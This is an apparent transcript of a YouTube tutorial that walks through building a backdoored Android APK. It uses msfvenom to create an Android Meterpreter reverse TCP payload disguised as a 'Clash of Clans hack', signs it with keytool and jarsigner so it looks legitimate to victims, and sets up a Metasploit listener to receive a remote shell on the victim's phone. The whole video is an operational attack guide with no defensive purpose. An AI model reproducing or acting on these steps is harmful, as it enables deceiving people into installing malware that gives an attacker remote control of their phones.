What is going on, guys? Jake with Exploit Academy. In this video, I'm going to show you how to create backdoor APK files for Android devices. But not only that, guys, I'm actually going to show you how to digitally create a signature for the APK file so it looks more legit. Not a lot of people show you how to do this, but it's actually really easy, and I'm going to show you in this video. So of course, let's check it out. Alright guys, now that we're back inside our Kali Linux VM, let's go ahead and create our APK file to start with. So open up a new terminal, and we're going to create our payload using MSF Venom. So type in MSF Venom, TACP for platform. We're going to type in Android because we're focusing on the Android platform. We're going to use a Meterpreter shell, and we're going to connect using a reverse TCP connection. And now we're going to use our local port, so lhost is equal to, and our local host IP address can be found if you type in ifconfig, and it says here inet 192.168.245, whatever. Mine is under Ethernet because I'm running a virtual machine, so that's what it is. If you're using a wireless card, it should say WLAN 0 or 1 or whatever, and you'll have an inet address similar to this. But for mine, it's under Ethernet 0, so I'm going to take this address and copy that as my lhost. Alright, now all we need is our L port, so let's do L port is equal to, which is our local port, and any number between 1 and 65,000. I like to use 1656. It doesn't really matter as long as you remember what it is. And create our output, so TAC-O, and I'm just going to put root, desktop, and whatever name you want to give it. I'm going to call it Clash of Clans hack.apk. And it should be generated for us onto our desktop. Alright, so there you go. It says saved as root desktop Clash of Clans hack.apk. Now, a lot of people, and especially a lot of videos, like to stop here. However, this won't really be that appealing to the person trying to hack because you have to go into developer options and allow downloads to be from unknown sources and all this kind of stuff, and it looks really sketchy to the person doing it. So to avoid that, we can create a certificate and sign the certificate so the app is actually signed and it looks more authentic. So to do that, I'm going to run these two commands that I have saved in this leafpad file here using the KeyTool program and the jar signer program. I'm going to include these commands inside my description, so all you guys got to do is copy and paste it to your liking and just run it, and you should be good to go. So to go ahead and run these, I'm going to start with the KeyTool to generate a certificate for my APK file. So I'm going to start a new terminal. So I'm going to copy the command for the KeyTool, select it, copy it, and paste. And really the only thing you got to change here is the alias if you want to change it. You can just put whatever name you want to give the certificate, but I'm just going to leave it my key because it doesn't really matter, and press enter. And it's going to ask you for the password. Just type in any random password, doesn't really matter. And then what is your first and last name? Just give us some random information, look believable. I'm just going to put John Doe, Exploit Academy, of course, got to be Exploit Academy. Exploit Academy again, doesn't really matter. What's the name of your city? Let's just put Chicago, YOLO. State of Providence, Illinois, YOLO. I don't know if I can type today. Illinois. Sure. That doesn't look right. Alright, whatever. United States, because we're in the United States. And correct. So I'm just going to put yes. And it says generating the key, and then all that. And then put in that password you just put in a second ago. And a new password. Alright, so there you go. It stored the key store file. That's all you really need. Now you just got to run this other command to actually sign the APK file. So that command, again, will be in the description. Just go ahead and copy and paste that to a terminal, and you should be good to go. So I'm going to copy that. Doesn't really matter. Open up a terminal and paste that. Now here, the only thing you have to do is point it to your APK file that we created using MSF Venom. So you can see here that it says myapplication.apk. Just put the name and location. So mine is stored on my desktop, so I have to delete this and put root desktop and then the name of the APK, which mine was coc hack.apk, and press enter. And the passphrase, so the password that we created earlier. And there you go. So it says right here, you can see jar signed. Alright, now that the APK is signed, the only thing we got to do is create a listener so we can connect back to our Kali box when the user runs the APK file. So to do that, of course, open up another terminal, and we got to create a listener using the Metasploit Framework console. So to do that, type in MSF console and press enter and let that load. It should take about 15 to 30 seconds. It can take a while sometimes. So when Metasploit loads, you should see a picture like this and a couple options talking about how many exploits there are and stuff like that. Okay, so now what we need to do is create a listener. Like with any hack, you need to have a listener ready to accept a connection coming back to your Kali box. So to do that, it's pretty simple. Just type in use exploit /multi/handler. And of course, you want to set the same payload that we created with the APK file. That is, of course, set payload Android Meterpreter reverse _ TCP, and you just got to set some options. So to do that, type in options and press enter, and put in the same information we had with the APK file. So the only two things you need is the L host and the L port. And to set options inside of Metasploit, all you need to do is type in set the option name, which is L host, and the IP address. So mine is 192.168.245.130, and press enter. And now set the L port, type in set L port, and mine was 1656, and press enter. And to verify your options are changed, type in show options one more time, and now you should see those options set. And all you got to do is type in run. Now Metasploit is waiting for a connection back. And that's pretty much it, guys. When the victim runs the APK file, you should have a Meterpreter session on their phone connecting back to your Kali box. Also, there are tools out there like APK tools and editors and stuff like that. We can actually change the icon, change the name, and stuff like that. I could keep going with this and walking you through this. However, this video would be way too long and it'd be way too overcomplicated. But there are resources out there to do that kind of stuff. I recommend that you look into them. There's a lot of cool stuff you can do. But for the basis, this is all you got to do, guys. I really hope you liked this video. Please like, subscribe to my channel, and I'll see you next time.